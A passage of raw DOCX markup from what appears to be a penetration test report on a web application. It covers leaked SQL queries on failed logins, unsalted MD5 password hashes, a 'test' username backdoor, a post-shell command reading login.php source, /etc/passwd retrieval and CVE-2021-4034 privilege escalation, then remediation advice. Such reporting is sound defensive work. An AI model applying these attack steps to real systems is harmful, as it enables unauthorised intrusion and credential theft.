      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3578101F" w14:textId="77777777" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="00071B65"/>
    <w:p w14:paraId="5A0F4BA7" w14:textId="77777777" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="00071B65">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D63012" w14:textId="01B1616F" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="00071B65">
      <w:r>
        <w:t>When a failed login attempt is made on the login.php page, the error message shows the SQL query that is submitted to the database. Revealing such the SQL query can inform attackers about the table name, password hash used, and database structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFED352" w14:textId="44EE77E0" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="00071B65">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D0534E" w14:textId="788AC82C" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="00071B65">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071B65">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F2E4833" wp14:editId="6D30AEFC">
            <wp:extent cx="5943600" cy="1403350"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="25400"/>
            <wp:docPr id="10813965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96589" name="Picture 1" descr="A close-up of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1403350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDADC7" w14:textId="6AB8327E" w:rsidR="00071B65" w:rsidRDefault="00071B65" w:rsidP="00071B65">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B051D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Failed Login Message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E1EF2" w14:textId="77777777" w:rsidR="00F12F69" w:rsidRDefault="00F12F69">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2946B5B1" w14:textId="77777777" w:rsidR="00F12F69" w:rsidRDefault="00F12F69">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D69188A" w14:textId="75596538" w:rsidR="00B051D3" w:rsidRDefault="00B94233" w:rsidP="00B051D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00B051D3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00B051D3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Insecure Cryptographic Implementation</w:t>
      </w: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3014"/>
        <w:gridCol w:w="6346"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B051D3" w14:paraId="249DBC8A" w14:textId="77777777" w:rsidTr="00E56270">
        <w:trPr>
          <w:trHeight w:val="236"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9359" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="03DF326A" w14:textId="2D4D3DDA" w:rsidR="00B051D3" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E56270">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
            <w:r w:rsidR="00B051D3" w:rsidRPr="00E56270">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00B051D3" w:rsidRPr="00E56270">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B051D3" w14:paraId="403C7232" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
          </w:tcPr>
          <w:p w14:paraId="5256BE2B" w14:textId="77777777" w:rsidR="00B051D3" w:rsidRDefault="00B051D3" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64CA4EC3" w14:textId="483305FB" w:rsidR="00B051D3" w:rsidRDefault="00B051D3" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidR="00E56270">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B051D3" w14:paraId="5B6900C0" w14:textId="77777777" w:rsidTr="003B2C88">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9F5BC75" w14:textId="77777777" w:rsidR="00B051D3" w:rsidRDefault="00B051D3" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</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134BBB9C" w14:textId="77777777" w:rsidR="00B051D3" w:rsidRDefault="00B051D3" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B051D3" w14:paraId="2077F4DB" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
          </w:tcPr>
          <w:p w14:paraId="664E9E9D" w14:textId="77777777" w:rsidR="00B051D3" w:rsidRDefault="00B051D3" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7127D735" w14:textId="77777777" w:rsidR="00B051D3" w:rsidRDefault="00B051D3" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34F93EEA" w14:textId="77777777" w:rsidR="00B051D3" w:rsidRDefault="00B051D3" w:rsidP="00B051D3"/>
    <w:p w14:paraId="58EF6A2D" w14:textId="77777777" w:rsidR="00B051D3" w:rsidRDefault="00B051D3" w:rsidP="00B051D3">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C93203" w14:textId="657EAA55" w:rsidR="00B051D3" w:rsidRDefault="0031119F" w:rsidP="00B051D3">
      <w:r>
        <w:t>When shell was obtained, the source code of the login.php file was examined</w:t>
      </w:r>
      <w:r w:rsidR="00B94233">
        <w:t xml:space="preserve"> by the command: </w:t>
      </w:r>
      <w:r w:rsidR="00B94233" w:rsidRPr="00B94233">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cat /var/www/staging/login.php</w:t>
      </w:r>
      <w:r>
        <w:t>. It was shown that the passwords are unsalted and md5 hashed. Furthermore, there is a backdoor if the username is “test.”</w:t>
      </w:r>
      <w:r w:rsidR="00B94233">
        <w:t xml:space="preserve"> The MD5 hash is considered </w:t>
      </w:r>
      <w:r w:rsidR="00B94233">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">broken and outdated for modern cryptographic standards. </w:t>
      </w:r>
      <w:r w:rsidR="00B94233" w:rsidRPr="00B94233">
        <w:t>MD5 has been shown to have collisions and can be computed relatively quickly, making it more vulnerable than other hashes to brute-force attacks</w:t>
      </w:r>
      <w:r w:rsidR="00B94233" w:rsidRPr="00B94233">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0031119F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A198FA2" wp14:editId="4F03528E">
            <wp:extent cx="5943600" cy="2241550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="335782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2746" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2241550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE68FFF" w14:textId="55A9983A" w:rsidR="00B94233" w:rsidRDefault="00B94233" w:rsidP="00B94233">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Login.php Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7646E4F3" w14:textId="77777777" w:rsidR="00F12F69" w:rsidRDefault="00F12F69">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF0C9B1" w14:textId="4CAF2A61" w:rsidR="00291C36" w:rsidRPr="00291C36" w:rsidRDefault="00291C36" w:rsidP="00291C36">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc153834532"/>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="3E6AF4AA" w14:textId="0F9DC829" w:rsidR="00291C36" w:rsidRPr="00291C36" w:rsidRDefault="00291C36" w:rsidP="00291C36">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00600A48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Threat Actor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2838E385" w14:textId="24ED003F" w:rsidR="00291C36" w:rsidRDefault="00291C36" w:rsidP="00600A48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Due to the discovery of a threat actor who retried the /etc/passwd file. Change all employee and system passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33114FC5" w14:textId="6A877EB6" w:rsidR="00291C36" w:rsidRDefault="00291C36" w:rsidP="00600A48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Have company wide cybersecurity trainings on phishing attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD11CA" w14:textId="75D63EB8" w:rsidR="00291C36" w:rsidRDefault="00291C36" w:rsidP="00600A48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Back up all data in case of a denial of service attack by the user</w:t>
      </w:r>
      <w:r w:rsidR="00F52E62">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DA04B4" w14:textId="77777777" w:rsidR="00F52E62" w:rsidRPr="00291C36" w:rsidRDefault="00F52E62" w:rsidP="00F52E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 – Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61FAA9" w14:textId="017947C6" w:rsidR="00F52E62" w:rsidRPr="00F52E62" w:rsidRDefault="00F52E62" w:rsidP="00F52E62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Updating Linux to the latest version will not only protect </w:t>
      </w:r>
      <w:r w:rsidRPr="00600A48">
        <w:t>against CVE-2021-4034</w:t>
      </w:r>
      <w:r>
        <w:t>, but other vulnerabilities and bugs as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F987765" w14:textId="77777777" w:rsidR="00600A48" w:rsidRDefault="00600A48" w:rsidP="00600A48">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8903C6" w14:textId="1BFED00B" w:rsidR="00600A48" w:rsidRPr="00291C36" w:rsidRDefault="00600A48" w:rsidP="00600A48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262A622" w14:textId="77777777" w:rsidR="00600A48" w:rsidRPr="00291C36" w:rsidRDefault="00600A48" w:rsidP="00600A48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Use prepared statements or parameterized queries, instead of concatenating the user input directly to the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C5312" w14:textId="4C85F0A4" w:rsidR="00600A48" w:rsidRPr="00291C36" w:rsidRDefault="00600A48" w:rsidP="00600A48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Input validation of the user input. SQL injection failed on the production server because there was input validation in place that restricted the use of apostrophes. Implementing this in the production server would eliminate the risk of SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5BC8E3" w14:textId="3C2934E8" w:rsidR="00600A48" w:rsidRDefault="00600A48" w:rsidP="00D93DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:t xml:space="preserve">Do not use actual employee credentials on the staging server as it is meant for development purposes. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D93DFA">
        <w:t>Temporary fakle</w:t>
      </w:r>
      <w:r w:rsidRPr="00291C36">
        <w:t xml:space="preserve"> credentials that are specifically designed for the staging server would be a better alternative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47163AA3" w14:textId="77777777" w:rsidR="00600A48" w:rsidRPr="00F52E62" w:rsidRDefault="00600A48" w:rsidP="00F52E62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4CD8D2" w14:textId="77777777" w:rsidR="00600A48" w:rsidRPr="00291C36" w:rsidRDefault="00600A48" w:rsidP="00600A48">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DC93E5" w14:textId="4B54A4F9" w:rsidR="00600A48" w:rsidRPr="00291C36" w:rsidRDefault="00600A48" w:rsidP="00600A48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BAB259" w14:textId="052F56E0" w:rsidR="00600A48" w:rsidRPr="00D93DFA" w:rsidRDefault="00D93DFA" w:rsidP="00D93DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D93DFA">
        <w:t>Encode user-generated content before displaying it in the browser. Use HTML escaping to convert special characters (&lt;, &gt;, &amp;, ", ') into their respective HTML entities (&amp;lt, &amp;gt, &amp;amp, &amp;quot, &amp;apos, &amp;#x60) to prevent the browser from interpreting them as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA1054" w14:textId="77777777" w:rsidR="00D93DFA" w:rsidRDefault="00D93DFA" w:rsidP="00D93DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5822BA07" w14:textId="68181CB4" w:rsidR="00291C36" w:rsidRPr="00291C36" w:rsidRDefault="00291C36" w:rsidP="00D93DFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00D93DFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D93DFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure Direct Object References</w:t>
      </w:r>
      <w:r w:rsidR="00F52E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474795AE" w14:textId="781D1D74" w:rsidR="00291C36" w:rsidRPr="00D93DFA" w:rsidRDefault="00D93DFA" w:rsidP="00714CFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D93DFA">
        <w:t xml:space="preserve">Use tokens or session IDs. There identifies should be cryptographically secure and random. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68367DD0" w14:textId="5C99A9BE" w:rsidR="00D93DFA" w:rsidRPr="00291C36" w:rsidRDefault="00D93DFA" w:rsidP="00714CFE">
      <w:pPr>
